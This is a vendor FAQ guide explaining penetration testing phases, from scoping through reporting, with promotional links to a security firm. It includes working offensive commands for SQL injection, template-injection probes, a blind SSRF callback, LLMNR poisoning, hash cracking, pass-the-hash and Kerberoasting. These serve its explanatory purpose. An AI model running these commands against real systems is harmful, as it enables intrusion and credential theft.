Penetration testing is one of the most misunderstood disciplines in cybersecurity. Organizations often conflate it with automated vulnerability scanning, treat it as a compliance checkbox, or assume it only applies to large enterprises. None of that is accurate. A properly scoped and executed penetration test is a rigorous, adversarial simulation designed to discover what a real attacker could do before a real attacker gets the chance.
This FAQ-style guide breaks down exactly how penetration testing works, what each phase looks like in practice, which tools professionals rely on, and what organizations should expect from a quality engagement.
Penetration testing, often shortened to pen testing, is a controlled, authorized simulation of an attack against a target environment. The goal is to identify vulnerabilities that could be exploited, chain them together into realistic attack paths, and provide actionable remediation guidance before an adversary can do the same.
Unlike automated vulnerability scanning, which passively identifies known weaknesses by matching fingerprints against CVE databases, penetration testing involves active exploitation, creative lateral movement, and human judgment. A scanner might flag that a service is running an outdated version. A penetration tester will attempt to exploit that service, pivot through the network, and demonstrate what an attacker could realistically access.
There are several types of engagements:
Before any technical activity begins, the engagement requires a clearly defined scope. This includes the IP ranges, domains, applications, and cloud environments that are in-scope, as well as anything explicitly excluded. Rules of engagement define the testing window, point-of-contact escalation procedures, acceptable testing methods, and any systems that must not be disrupted.
A professional penetration tester will also require written authorization before touching any system. This documentation protects both the tester and the client.
Reconnaissance is the intelligence-gathering phase. The objective is to map the target's external footprint before attempting any active testing. This divides into passive and active reconnaissance.
Passive reconnaissance involves collecting publicly available information without interacting with the target directly. Tools and techniques include:
Active reconnaissance involves direct interaction with the target and may trigger intrusion detection systems. This includes DNS enumeration, port scanning, and service fingerprinting.
# Subdomain enumeration using dnsx and subfinder
subfinder -d target.com -silent | dnsx -silent -a -resp
[cta]
# Full TCP port scan with service version detection and default scripts
nmap -sV -sC -p- --min-rate 5000 -oA recon/target_full target.com
[cta]
With a map of the attack surface in hand, the tester identifies exploitable weaknesses. This is where automated scanning is combined with manual analysis.
Nuclei is a community-driven vulnerability scanner that uses YAML-based templates for targeted detection across web applications, APIs, and infrastructure. Unlike generic scanners, Nuclei templates are often written for specific CVEs, misconfigurations, and exposed panels.
# Run Nuclei with a curated template set against a target
nuclei -u https://target.com -t nuclei-templates/ -severity critical,high -o nuclei_results.txt
[cta]
For web applications, FFUF is widely used for content and parameter discovery, which feeds directly into the vulnerability analysis phase.
# Directory and file fuzzing with FFUF
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -mc 200,301,302,403 -o ffuf_results.json
[cta]
Manual analysis at this stage involves reviewing findings in context. A tester evaluates whether discovered services are actually exploitable, whether default credentials are in use, and whether application logic flaws exist that automated tools cannot detect.
Web application testing follows the OWASP Testing Guide methodology. Common vulnerability classes include SQL injection, cross-site scripting, insecure direct object references, server-side request forgery, and broken authentication.
SQLMap is used for automated SQL injection detection and exploitation when a potential injection point is identified manually.
# Testing a login form parameter for SQL injection
sqlmap -u "https://target.com/login" --data="username=admin&password=test" --level=5 --risk=3 --dbs --batch
[cta]
For server-side template injection, a tester might probe a form field with a payload like:
{{7*7}}
${7*7}
<%= 7*7 %>
If any of these expressions evaluates to 49 in the server's response, it confirms template injection, which can often be escalated to remote code execution depending on the template engine in use.
For SSRF testing, a tester uses an out-of-band interaction server such as Burp Collaborator or interactsh to detect blind vulnerabilities:
# Triggering a blind SSRF using interactsh
curl -X POST https://target.com/api/fetch -d '{"url":"https://your-interactsh-url.oast.fun"}'
[cta]
For internal network engagements or after gaining an initial foothold, testers pivot through the network using techniques that mirror real threat actor behavior.
Responder is used for network protocol poisoning on internal segments, capturing NTLMv2 challenge-response hashes over mDNS, NBT-NS, and LLMNR:
# Run Responder in analyze mode first to understand the environment
responder -I eth0 -A
# Active poisoning to capture hashes
responder -I eth0 -wrf
[cta]
Captured hashes are then cracked offline using Hashcat:
# Cracking NTLMv2 hashes with Hashcat using a rule-enhanced wordlist
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
[cta]
For Active Directory environments, BloodHound combined with SharpHound is used to map privilege escalation paths and identify attack paths to Domain Admin:
# Running SharpHound for AD data collection
.\SharpHound.exe -c All --zipfilename ad_recon.zip
[cta]
BloodHound's graph-based interface visualizes relationships between users, groups, computers, and GPOs, making it possible to identify non-obvious attack chains that would take hours to find manually.
Lateral movement is what separates a penetration test from a basic vulnerability scan. After gaining an initial foothold, the question a penetration tester asks is: where can this access lead?
Techniques commonly used during lateral movement include:
Pass-the-Hash: Using a captured NTLM hash to authenticate without knowing the plaintext password.
# Pass-the-Hash using impacket's psexec
impacket-psexec -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.50
[cta]
Kerberoasting: Requesting Kerberos service tickets for accounts with registered SPNs and cracking them offline.
# Kerberoasting with impacket
impacket-GetUserSPNs target.local/user:password -dc-ip 192.168.1.1 -request -outputfile kerberoast_hashes.txt
[cta]
# Cracking the extracted TGS tickets
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
[cta]
These techniques demonstrate to clients that a single compromised workstation or a single weak service account password can result in full domain compromise. This is the kind of insight that drives real security investment. Organizations serious about understanding their exposure should look at Redfox Cybersecurity's penetration testing services to understand how these attack chains apply to their own environments.
This is one of the most common questions from clients evaluating their options.
A penetration test is typically time-boxed, scoped to specific systems or application layers, and oriented toward finding as many exploitable vulnerabilities as possible within that scope. It is thorough, technical, and designed to produce a comprehensive findings report.
A red team exercise is objective-based. The red team is given a realistic adversarial goal, such as exfiltrating a specific data set, achieving domain administrator access, or compromising a named executive's workstation, and is evaluated on whether they can achieve it. Red team engagements are longer, less constrained, and explicitly designed to test the organization's detection and response capabilities alongside its technical defenses.
Red team engagements use frameworks like MITRE ATT&CK to map techniques and measure coverage. Command-and-control infrastructure is established using tools like Havoc or Sliver, which support sophisticated evasion, staging, and post-exploitation capabilities without the detection signatures associated with commodity tools.
The choice between a penetration test and a red team exercise depends on organizational maturity, budget, and objectives. For organizations without a mature security operations center, a penetration test will almost always deliver more immediate value.
Cloud penetration testing introduces a distinct set of methodologies because traditional network scanning largely does not apply to serverless functions, managed databases, or identity-driven access models.
For AWS environments, testers commonly use Pacu, an open-source AWS exploitation framework:
# Enumerate IAM permissions for a compromised key
python3 pacu.py
Pacu > import_keys --access-key-id AKIA... --secret-key ...
Pacu > run iam__enum_permissions
[cta]
ScoutSuite is used for multi-cloud security posture assessment, identifying misconfigurations across AWS, Azure, and GCP:
# Running ScoutSuite against an AWS account
python3 scout.py aws --profile compromised_profile --report-dir scoutsuite_report/
[cta]
Common cloud-specific findings include:
Cloud misconfigurations are particularly dangerous because they often expose crown-jewel data without requiring any exploit. A misconfigured S3 bucket policy requires no vulnerability, no payload, and no evasion. It is simply open.
If your organization runs workloads in AWS, Azure, or GCP, Redfox Cybersecurity's cloud security testing services map directly to the attack techniques used by sophisticated threat actors targeting cloud-native infrastructure.
The report is the deliverable that matters most to stakeholders outside the security team. A professional penetration test report includes the following components:
The answer depends on the pace of change in the environment. Organizations that deploy code continuously, onboard new cloud services frequently, or operate in regulated industries should treat penetration testing as an ongoing discipline rather than an annual event.
A reasonable baseline for most organizations:
Compliance frameworks like PCI DSS, ISO 27001, SOC 2, and HIPAA all include penetration testing requirements, but compliance frequency is a floor, not a ceiling. A once-per-year test conducted purely for audit purposes leaves organizations exposed for the eleven months between engagements.
Penetration testing is an adversarial discipline that requires technical depth, creative problem-solving, and a systematic methodology. It is not a scan. It is not a checklist. It is a structured attempt to find out what a determined attacker could accomplish against a specific target at a specific point in time.
The phases are deliberate: reconnaissance builds the target map, vulnerability analysis identifies the weak points, exploitation demonstrates real-world impact, and lateral movement reveals how far a single foothold can travel. The report translates all of that into findings that security teams can act on and executives can understand.
Organizations that invest in quality penetration testing gain something that no automated tool can provide: a realistic, evidence-backed understanding of their own exposure.
Redfox Cybersecurity delivers penetration testing engagements across web applications, internal networks, cloud environments, and Active Directory infrastructure. To discuss an engagement scoped to your environment, visit https://www.redfoxsec.com/services.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
